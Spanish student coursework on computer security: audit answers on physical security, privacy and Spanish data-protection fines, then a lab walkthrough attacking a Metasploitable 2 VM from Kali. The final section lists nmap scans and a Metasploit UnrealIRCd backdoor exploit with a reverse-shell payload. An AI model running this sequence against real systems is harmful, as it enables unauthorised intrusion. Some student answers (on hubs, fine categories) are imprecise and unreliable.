Clasificaciones, modalidades y tendencias de investigación educativa.
Proyecto1 SEIN
1. Proyecto en el que se incluyen tanto la
descripción de medidas aplicables de
seguridad en diversos casos como un
ataque desde una máquina kali-linux a
una máquina con metasplotaible para
atacarla.
Proyecto 1.
Conceptos
Seguridad informática
Patricia Durán de Jesús
2. ÍNDICE
1. MEDIDAS DE SEGURIDAD PASIVA...................................................................1
2. ASEGURAR LA PRIVACIDAD .........................................................................3
3. DEMOSTRACIÓN VULNERABILIDADES .............................................................6
3. Seguridad informática 2017-2018 Patricia Durán de Jesús
1
1. MEDIDAS DE SEGURIDAD PASIVA
Aplicar medidas de seguridad pasiva en sistemas informáticos describiendo
características de entornos y relacionándolas con sus necesidades.
Trabajas en una auditoría de seguridad informática. Llega un nuevo cliente
que desea conocer la situación de su empresa en cuanto a seguridad
informática y si es aceptable o podría mejorar. Durante la entrevista
tomas las siguientes notas:
El edificio tiene un servicio de vigilancia a través de una empresa
externa. Por reducción del presupuesto, ahora solo hay un vigilante que
también atiende el edificio del otro lado de la calle. → Se necesita
mayor seguridad. No se puede tener a un único vigilante y que encima
debe estar vigilando dos edificios ya que la vigilancia no es igual de
fiable y constante.
El CPD tiene otro vigilante, de otra compañía, que también atiende el
teléfono de la centralita a partir de las 3, cuando termina el turno del
recepcionista. → El centro de protección de datos debe estar bien
protegido, no puede haber un vigilante que tenga 2 cargos más porque
no presta la atención suficiente y al distraerse pueden haber posibles
robos o alteraciones.
Para entrar al CPD, cada informático tiene una tarjeta particular, si
bien hay una en el cajón de la mesa del vigilante para el personal de
limpieza o por si ocurre una emergencia. → Cada tarjeta debe ser
intransferible y no pueden tener acceso a cada tarjeta particular
distintas personas al propietario de la misma. Además de que cada
informático no debe tener acceso al CPD, solo los encargados del
mismo.
Una vez a la semana se hace la copia de seguridad. Como solo disponen
de un dispositivo de cinta, los cuatro servidores se reparten cada
semana del mes. Dado que solo hay un vigilante para el CPD, las cintas
se dejan dentro de la sala, cada una encima de su servidor (cada
servidor tiene una cinta en exclusiva). → Las copias deben ser
instantáneas ya que en el momento en que se hacen cambios, añaden o
quitan cosas se pueden perder datos. Las cintas no pueden estar a
plena vista y mucho menos encima de cada servidor, si alguien entrase
a robar los datos, l tendría muy fácil ya que solo hay un vigilante. Se
tiene que poner mayor vigilancia, realizar copias de seguridad
4. Seguridad informática 2017-2018 Patricia Durán de Jesús
2
instantáneas, mejorar el método de las copias y guardarlas en un lugar
seguro que no esté a la vista de cualquiera.
El edificio pertenece al patrimonio histórico y no admite reformas en la
fachada. Por tanto, no ha sido posible instalar equipos de aire
acondicionado en el CPD. Para combatir el calor que desprenden los
ordenadores, las ventanas están siempre abiertas. Cada servidor tiene
un disco duro de alta gama, que no ha fallado nunca. → Se necesita
refrigeración, las ventanas no pueden estar abiertas, entran suciedad y
polvo constantemente y eso genera más calor en los equipos, se debe
instalar refrigeración y en caso de que no puedan por no admitir
reformas, se deberá cambiar el CPD a otro edificio que si permita
realizar los cambios necesarios.
Los servidores tienen doble fuente de alimentación, por si se estropea
alguna. → Está bien e incluso deberían haber Sistemas de Alimentación
Ininterrumpida.
El presidente y el contable tienen cada uno un portátil de la empresa.
El disco duro de estas máquinas no está cifrado porque no se arriesgan
al desastre que supondría olvidar la contraseña. → Cifrar el disco duro
y cada equipo protegerlo con una contraseña bien elaborada, sin datos
personales o relacionados con el trabajo o empresa.
Los ordenadores tienen dos usuarios: uno para las tareas normales y
otro cuando necesitan realizar alguna instalación o modificar un
parámetro del sistema operativo. Los empleados saben cuándo deben
usar cada uno. → Los empleados no deben tener acceso a instalaciones
o modificaciones de parámetros del sistema operativo. Eso puede
ocasionar problemas, ya que pueden configurar o borrar algo que no
deben o incluso instalar malware sin darse cuenta y crea
vulnerabilidades. Los empleados deben tener un usuario en el que
tengan permisos limitados.
Termináis por hoy la entrevista porque ha sido una reunión muy larga.
Todavía no has redactado el informe final, pero ¿encuentras algo que
mejorar? ¿Qué alternativa le puedes proponer?
Cambiar la seguridad y forma de actuar de la empresa con lo ya indicado
en los apartados anteriores. Modificaría los niveles de seguridad, copias
de seguridad realizadas, etc.
5. Seguridad informática 2017-2018 Patricia Durán de Jesús
3
2. ASEGURAR LA PRIVACIDAD
Asegurar la privacidad de la información transmitida en redes informáticas
describiendo vulnerabilidades e instalando software específico.
Al día siguiente continúa la entrevista: Tus nuevas notas son:
Hay una red wifi en la oficina que permite entrar en la red de
ordenadores y salir a Internet. No tiene contraseña para que los
clientes puedan utilizarla con total comodidad. → Deben de poner una
contraseña, ya que no tenerla no hace que sea más cómodo si no que
permite a personas externas a la empresa que puedan acceder sin
ningún tipo de complejidad. Al menos teniendo contraseñas y
diferenciando bien la red pública de la red privada de la empresa evitas
posibles intrusos.
La mayoría de los ordenadores utilizan Windows XP, pero algunos
empleados necesitan Windows 7, 8 o incluso 10 para correr ciertas
aplicaciones. Como la empresa no puede afrontar la compra de nuevas
licencias, están utilizando software pirata. → La empresa debe asumir
el precio de unas licencias de Windows 10, por ejemplo, ya que es el
más actual y tiene soporte técnico mientras que Windows XP ya no. En
caso de no poder asumir el precio, podrían pasar a un software libre.
En cuanto al antivirus, cada empleado pone el que más le gusta y se los
pasan entre ellos mediante dispositivos USB. → Se debería tener un
mismo antivirus para todos los equipos y estar terminantemente
prohibido el uso de USB ajenos o propios de los trabajadores, ya que
existe el riesgo de que ese USB esté infectado con malware e infectase
a toda la empresa.
Los ordenadores que hacen de servidores tienen activadas las
actualizaciones automáticas de todas las aplicaciones y el sistema
operativo, pero en los ordenadores de empleados no se hace porque
han visto que se satura la conexión a Internet. → Se deben actualizar
siempre que sea necesario ya que en las actualizaciones existen
modificaciones del software que quizá implementen mayor seguridad o
arreglen fallos que puedan ocasionar un agujero de seguridad en un
futuro lejano, o incluso cercano.
La mayoría de los equipos de red son switch y routers, pero algunos
despachos todavía tienen hubs porque son fiables y el ancho de banda
es suficiente. → Los hubs generan mucho tráfico y consumen más
6. Seguridad informática 2017-2018 Patricia Durán de Jesús
4
ancho de banda, aunque son más rápidos, no son tan fiables como
pueden ser un switch o un router-
Para entrar a la red desde Internet utilizan Hamachi, un servicio
gratuito y muy sencillo de instalar. → Hamachi tiene como desventajas
los problemas con los enrutadores, ya que se generan conflictos. Otra
opción para tener una red privada sería OpenVPN.
El servidor web está instalado sobre una máquina con sistema operativo
Linux Ubuntu Server 9.04. → Cambiar la versión de Linux Ubuntu Server
a una más actualizada para mantenernos al día en actualizaciones
tanto a nivel de seguridad como software en general. Últimas
versiones: Ubuntu Server 16.04.3 LTS y Ubuntu Server 17.04
La empresa recoge datos de las personas que solicitan información acerca
de las promociones que tiene actualmente. El objetivo es poder enviarles
información sobre futuras promociones. Los datos que se solicitan son:
nombre, dirección y correo electrónico. Una secretaria introduce los datos
en una hoja Excel en su ordenador.
¿Crees que tendría que haber solicitado a la Agencia de Protección de
Datos la creación del fichero que contiene los datos?
La Ley Orgánica de Protección de datos de carácter personal de las
personas físicas. Pueden estar en cualquier tipo de soporte, digitalizado
o no. La Ley establece cómo se pueden tomar los datos, que tipo de
almacenamiento protegido necesitan y qué derecho y obligaciones
tiene el ciudadano. Se debe solicitar o informar a la Agencia de
Protección de Datos.
¿Qué nivel de seguridad requerirá el fichero?
Requiere el nivel básico
¿Qué medidas de seguridad requiere este nivel?
- Identificar y autenticar a los usuarios que pueden trabajar con estos
datos
- Llevar un registro de incidencias acontecidas en el fichero
- Realizar copias de seguridad como mínimo semanalmente
Haz un listado de las infracciones que podrían cometerse con respecto
al fichero y destaca cuáles de ellas supondrían una sanción mayor.
Leves (601,01 € y 60.101,21 €):
- No solicitar la inscripción del fichero en la AEDP
7. Seguridad informática 2017-2018 Patricia Durán de Jesús
5
- Recopilar datos personales sin informar previamente
- No atender a las solicitudes de rectificación o cancelación
- No atender a las consultas por parte de la AGPD
Graves (60.101,21 € y 300.506,25 €)
- No inscribir los ficheros en la AGPD.
- Utilizar los ficheros con distinta finalidad con la se crearon.
- No tener el consentimiento del interesado para recabar sus datos
personales
- No permitir el acceso a los ficheros.
- Mantener datos inexactos o no efectuar las modificaciones
solicitadas
- No seguir los principios y garantías de la LOPD
- Tratar datos especialmente protegidos sin la autorización del
afectado
- No remitir a la AGPD las notificaciones previstas en la LOPD.
- Mantener los ficheros sin las debidas condiciones de seguridad.
Muy graves (300.506,25 € y 601.012,1 €)
- Crear ficheros para almacenar datos que revelen datos
especialmente protegidos.
- Recogida de datos de manera engañosa o fraudulenta.
- Recabar datos especialmente protegidos sin la autorización del
afectado.
- No atender u obstaculizar de forma sistemática las solicitudes de
cancelación o rectificación.
- Vulnerar el secreto sobre datos especialmente protegidos.
- La comunicación o cesión de datos cuando ésta no esté permitida.
- No cesar en el uso ilegítimo a petición de la AGPD.
- Tratar los datos de forma ilegítima o con menosprecio de principios
y garantías que le sean de aplicación.
- No atender de forma sistemática los requerimientos de la AGPD.
- La transferencia temporal o definitiva de datos de carácter personal
con destino a países sin nivel de protección equiparable o sin
autorización
8. Seguridad informática 2017-2018 Patricia Durán de Jesús
6
3. DEMOSTRACIÓN VULNERABILIDADES
Completar el informe con una demo en la que le harás ver al cliente cómo
se pueden aprovechar las vulnerabilidades de sus sistemas. Para ello vas a
realizar la práctica de INCIBE “Explotando un sistema” perteneciente al
capítulo “Fundamentos del análisis de sistemas”, siguiendo el
correspondiente vídeo-tutorial de YouTube.
Vas a necesitar dos máquinas virtuales, una con kali-linux (máquina
atacante) y la otra con metasploitable 2 (máquina vulnerable).
Primero comprobaremos la visibilidad entre las máquinas, tanto con kali-linux
como con la máquina vulnerable, la metasploitable. Podemos comprobar que
la IP de la máquina vulnerable es 192.168.1.165 y la máquina atacante
192.168.1.166
9. Seguridad informática 2017-2018 Patricia Durán de Jesús
7
Para comprobar la visibilidad entre ambas, haremos ping desde la máquina
atacante a la máquina vulnerable:
- Ping 192.168.1.165
Utilizaremos Nmap para escanear la IP de la red (192.168.1.0) para encontrar
los equipos encendidos en la red.
10. Seguridad informática 2017-2018 Patricia Durán de Jesús
8
Procederemos a escanear los puertos de nuestra máquina con nmap –sT –O
192.168.1.166 (IP de la máquina atacada)
Lo siguiente que
haremos será:
Nmap –sT –sV (IP de la
máquina vulnerable,
atacada)
11. Seguridad informática 2017-2018 Patricia Durán de Jesús
9
El siguiente paso a realizar será “telnet (IP del objetivo) (Puerto de telnet).
Una vez hecho, podremos poner herramientas como FTP o SSH. El
procedimiento es abrir la consola e introducir los comandos:
- ftp <dirección IP>
- telnet <dirección IP>
- ssh <dirección IP>
13. Seguridad informática 2017-2018 Patricia Durán de Jesús
11
Abriremos una consola del sistema e introduciremos estos comandos:
Msfconsole
Use exploit /unix/irc/unreal_ircd_3281_backdoor
Set RHOST <IP Metasploitable>
Set payload <payload> (cmd/unix/reverse)
Set LHOST <IP
Kali linux>
Exploit